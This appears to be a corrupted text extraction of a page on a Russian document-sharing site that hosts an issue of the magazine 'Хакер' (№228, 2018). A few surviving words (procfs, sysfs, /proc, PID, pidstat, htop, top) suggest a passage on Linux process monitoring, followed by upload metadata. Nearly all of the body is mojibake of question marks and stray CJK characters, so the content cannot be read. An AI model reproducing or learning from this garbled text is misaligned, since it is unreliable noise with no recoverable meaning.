?�????,�??�????�????�??�???,牜???�?????�??��?????�??�.
??��??�??�?�???????:燩rocfs燼nd爏ysfs�牜???�????�??�???�/proc�.
??� ???�????� ?� ?????� ???????.� ???� ????� ???�?� ????�???,� ?????� PID� ?????�
?????� ???�??�??,� ????� ?????�?� pidstat� ?� htop� (??� ????�???�???� ??????,
?????�???�??????�??�??爐op,�???�?�?????�???�??�???�???�?�??�?,�???�
???�??�????�???�??�????�?�????).
???�?�???,�????�?爐ime�??�???�?�????�???�??�???,�????�?�???�??
???�?�??�?????
Автор
barmaley
barmaley1057   документов Отправить письмо
Документ
Категория
Без категории
Просмотров
25
Размер файла
56 487 Кб
Теги
ХАКЕР №228 2018
1/--страниц
Пожаловаться на содержимое документа